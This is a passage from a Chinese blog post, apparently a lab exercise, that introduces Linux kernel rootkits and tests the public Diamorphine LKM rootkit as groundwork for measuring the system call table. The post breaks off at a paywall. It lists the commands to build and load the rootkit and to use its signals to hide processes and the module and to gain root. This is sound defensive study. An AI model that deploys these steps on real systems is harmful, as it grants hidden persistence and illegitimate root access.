Linux内核的Rootkit攻击与度量对象提取

最新推荐文章于 2024-06-10 12:05:06 发布
最新推荐文章于 2024-06-10 12:05:06 发布
阅读量784 收藏 1
点赞数 1
文章标签: linux 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45027952/article/details/130762110
版权

Rootkit攻击与度量对象提取

文章目录

Rootkit攻击

实验环境搭建

选择Linux 5.10版本作为实验环境,首先确认内核版本。

uname -r

Rootkit简介

  • Rootkit 主要任务是隐藏并长期驻留在感染机器上的从事各类恶意活动,达到高隐藏高持久化目的
  • 根据运行时权限可以划分为内核态用户态
    • 内核态 Rootkit 具有与操作系统相同的权限,在内核级别运行,通常作为设备驱动程序或可加载模块加载到目标设备中。内核态 Rootkit 很难开发,因为源代码中的任何错误都会影响目标系统的稳定性,这将是发现恶意程序的最直接表现。
    • 用户态 Rootkit 以与大多数应用程序具有相同的运行权限。它们可以拦截系统调用并替换 API 或劫持应用程序返回的值,以获得对设备的控制。用户态 Rootkit 所需的前置知识和复杂度,与内核态Rootkit相比更简单,更容易开发,因此常用于大范围攻击。
  • 功能有获得远程访问、窃取数据、各类隐藏功能、创建永久root权限后门、隐私监控、劫持或关机安全程序
  • 当前主要的Rootkit检测的方法包括但不限于以下几种类型,基于Rootkit运行的效果进行检测静态文件特征检测、动态行为分析检测、数据完整性检测。它们各有利弊
  • 当前主流Rootkit检测项目有Chkrootkit、Rkhunter、Kjackal、Tyton、Elkeid、stmichael-lkm、Qiling

Rootkit测试

选择内核态 LKM Rootkit Diamorphine进行测试。项目链接:https://github.com/m0nad/Diamorphine。对于源码的解释可见(21条消息) Diamorphine rootkit的特性与原理分析_guoguangwu的博客-CSDN博客。如果需要更详细的了解可以参考(21条消息) Linux Rootkit躲避内核检测_dog250的博客-CSDN博客

Diamorphine是用于Linux内核2.6.x/3.x/4.x/5.x和ARM64的LKM rootkit

安装Diamorphine

验证内核是否为2.6.x/3.x/4.x/5.x

uname -r

克隆存储库

git clone https://github.com/m0nad/Diamorphine

进入文件夹

cd Diamorphine

编译

make

进入 root 权限

sudo su

加载模块

insmod diamorphine.ko
测试Diamorphine

已知的功能如下

  • 当加载的时候,模块是不可见的(lsmod 看不到)
  • 通过发送31信号,可以达到隐藏和不隐藏进程的目的
  • 通过发送63信号,可以隐藏和不隐藏该内核模块
  • 通过发送64信号(给任何进程),可以将用户变成root
  • 如果文件或者目录以MAGIC_PREFIX开始,将会隐藏

初始加载时:

lsmod | grep -i diamorphine

发现模块不显示,使用信号63使其显示

kill -63 0
lsmod | grep -i diamorphine

使用信号31

ps aux | gerp [任意进程号]
kill -31 [任意进程号] # 实现对进程的隐藏
ps aux | gerp [任意进程号] # 发现该进程被隐藏
kill -31 [任意进程号] #解除隐藏

使用信号64,在用户态测试

whoami #输出为用户
kill -64 0
whoami #输出为root

文件或者目录以MAGIC_PREFIX开始,其中MAGIC_PREFIX为“diamorphine_secret”

卸载Diamorphine

模块开始时不可见,若要删除,需要使其可见

kill -63 0

删除模块root权限

rmmod diamorphine

度量对象提取

阅读源码可知,该Rootkit通过挟持系统调用进行攻击,故需要提取整张系统调用表进行度量。

#保存原调度地址,用于后续恢复
#
最低0.47元/天 解锁文章
LinuxRootkit介绍
cqwei1987的博客
07-15 2228
本文对Linux中的Rootkit进行简单介绍,主要用于防护方案对Rootkit的防御效果介绍。
信息安全工程师第二版考试总结+笔记
热门推荐
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
潜伏的 Linux Rootkit:Syslogk
阿道夫的博客
02-27 604
Syslogk 使用了多种方式隐藏自身:通过 hk_proc_readdir 隐藏包含恶意文件的目录通过 hk_getpr 隐藏特定进程通过 hk_t4_seq_show 隐藏特定服务通过安装 netfilter hook 控制接收到的特制 TCP 数据包通过硬编码的密钥利用特制 TCP 数据包远程启动 PayloadSyslogk 非常隐蔽,在特制的 TCP 数据包发送到实现主机前并不会加载后门,执行时也是打着 SMTP 合法服务的旗号进行隐蔽传输。
内核Rootkit技术入门(1)
09-27 782
【导读】本文介绍了Windows下的内核Rootkit的最基础性的东西,以及利用驱动程序将代码导入到内核的方法。虽然我们还没有涉及到真正的Rootkit,但这些内容是我们掌握Rootkit的必经之路,就像我们要建一座6层的楼房,却不能撇开基础和低层而直接盖第六层一样!更多的内容,会在后续的文章中陆续介绍。
linux-rootkit
weixin_42021187的博客
01-13 329
【代码】linux-rootkit
【转】内核Rootkit技术入门(二)
annhf的专栏
05-04 1220
本文将向读者介绍如何将编译好的驱动程序运行起来并察看它的调试语句给出的消息。换句话说,我们要做的是最简单的调试工作。一、驱动程序的加载和执行当我们开发Rootkit的时候,经常需要改变其功能,这时经常重复加载、运行、测试、停止和卸载这一系列的动作。加载和运行驱动程序的方法很多,我们这里介绍的是最简单的一种——利用工具软件InstDrv。InstDrv是一款非常小巧的工具,它的.zip压缩包
linux常用rootkit技术,unix下的 rootkit
weixin_39605997的博客
05-13 737
unix下的 rootkit传统的Rootkit是一种比普通***防御办法:Rootkit如此可怕,得好好防它才行,实际上,最有效的防御方法是定期对重要系统文件的完整性进行核查,这类的工具很多,像 Tripwire就是一个非常不错的文件完整性检查工具。一但发现遭受到 Rootkit***,必须完全重装所有的系统文件、部件和程序,以确保安全性。写到这里,战争似乎结束了,然而更可怕的Rootkit还没...
论文细读:HOLMES:Real-time APT Detection through Correlation of Suspicious Information Flows
yuehao1143631149的博客
05-08 3568
HOLMES:基于可疑信息流关联的实时APT检测 Abstract 在本文中,我们介绍了Holmes系统,它实现了一种新的检测高级和持续性威胁(APT)的方法。Holmes的灵感来自于现实世界APT的几个案例研究,这些案例突出了APT的一些共同目标。简而言之,Holmes的目标是产生一个探测信号,表明存在一组协调一致的活动,这些活动是APT活动的一部分。我们的方法解决的主要挑战之一涉及开发一套使检测信号健壮和可靠的技术。从高层次上讲,我们开发的技术有效地利用了攻击者活动期间出现的可疑信息流之间的关联。除
内核中引入rootkit代码
boluo1982107的专栏
05-24 611
将代码植入内核中的直接方式是使用可加载模块(有时称为设备驱动程序或内核驱动程序)。Windows设备驱动程序,入口点必须注册函数回调。NTSTATUS DriverEntry(...){    theDriver->DriverUnload = MyCleanupRoutine;}NTSTATUS MyCleanupRoutine(){}驱动程序
一个基于 LKM 的 Linux 内核rootkit 的实现
郭同学如是说
02-27 1538
rootkit是一种恶意软件,攻击者可以在获得 root 或管理员权限后安装它,从而隐藏入侵并保持root权限访问。rootkit可以是用户级的,也可以是内核级的。关于rootkit的详细介绍可以参考https://en.wikipedia.org/wiki/rootkit 有许多技术可以实现rootkit,本项目使用的是通过编写LKM(Linux kernel module)并hook系统调用表的方式。这种方式具有诸多优点,比如rootkit作为内核模块可以动态的加载和卸载,大多数rootkit也都是通
内核rootkit
04-25
内核Rootkit隐藏性研究改进(硕士论文)
linux下2.6.32的rootkit,隐藏文件目录
10-09
使用的是enyelkm v1.1本身的获取系统调用表的过程。 隐藏文件、目录通过修改sys_call_table第220项。
rootkit windows内核的安全防护
02-10
本书是一本介绍rootkit的开山之作,对学习很有帮助,推荐给大家
一款Linux下的rootkit工具源码
04-24
Linux下的rootkit源码,可实现文件、进程、网络、模块的隐藏
Linux Rootkit之一:Linux Rootkit简介
Remy的学习记录
06-13 3485
1.1定义 Rootkit是一套由入侵者留在系统中的后门程序。Rootkit通常只有在系统已经被侵入并且获得root权限后才被安装进系统,并帮助入侵者长期控制系统,,搜集主机和网络信息,并隐藏入侵者的痕迹。也就是说,Rootkit需要持久并毫无察觉地驻留在目标系统中,对系统进行操纵、并通过隐秘渠道收集数据的程序。所以,Rootkit的三要素就是:隐藏、操纵、收集数据。不同的操作系统会有不同的Ro
Linux Rootkit 系列三:实例详解 Rootkit 必备的基本功能
whatday的专栏
07-23 1060
本文所需的完整代码位于笔者的代码仓库:https://github.com/NoviceLive/research-rootkit测试建议:不要在物理机测试!不要在物理机测试! 不要在物理机测试! 概要 在上一篇文章中笔者详细地阐述了基于直接修改系统调用表 (即sys_call_table/ia32_sys_call_table)的挂钩, 文章强调以代码动手实验为核心。 长...
渗透测试内核安全系列课程:Rootkit技术初探(一)
fearhacker的专栏
06-06 1726
注意,段描述符中,第 41-44 位,是 TYPE ,其 配合 段描述符 中的 第 45 位 S 位 的值,来确定 当前 段描述符 所指向的 段空间 是 数据段空间,还是 代码段空间!注意,段描述符中,第 55 位,存储着 D / B 位 ,其影响着,段的寻址方式!如果值为 0 ,意味着,这个段描述符,也会是无效的!注意,段描述符中,第17-32位,存储着 段地址 的 第1-16位 ,第33-40位,存储着 段地址 的 第17-24位,第57-64位,存储着 段地址 的 第25-32位。
Linux中基于eBPF的恶意利用检测机制(rootkit、驱动)
墨痕诉清风的博客
03-10 1926
前言 近几年来,云原生领域飞速发展,k8s成为公认的云操作系统。容器的高频率部署、短暂的生命周期、复杂的网络路由,都给内核带来了新的挑战。系统内核在面对复杂性不断增长,性能、可扩展性新需求的同时,还需要保障系统稳定可用,这是极其困难的事情。 eBPF出现,以较小的子系统改动,保障了系统内核的稳定。具备实时动态加载的特性,将业务逻辑加载到内核,实现热更新的动态执行。eBPF技术的出现,衍生新业务场景的同时,也带来了安全威胁。 现状分析 在解决很多技术难题的同时,eBPF技术的出现也带来了新的恶意利用
渗透测试内核安全系列课程:Rootkit技术初探(四)
最新发布
fearhacker的专栏
06-10 1245
当 PDE( 页目录项 ) 的 PS 位( 第8位 ) 为 1 时,代表PDE( 页目录项 )直接指向页( P ),这时,页的大小为 4MB(这是一个大页),此时,这个大页( 4MB 大小的物理页)的物理地址计算公式为: PDE( 页目录项 ) 的 高 10 位 + 线性地址 的 低 22 位。上述的页目录( PDT )的子项(PDE)除了前7位之外,其它各比特位用途不固定(各关键比特位的位置,同样不固定),因操作系统类型、CPU 版本不同而存在差异!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值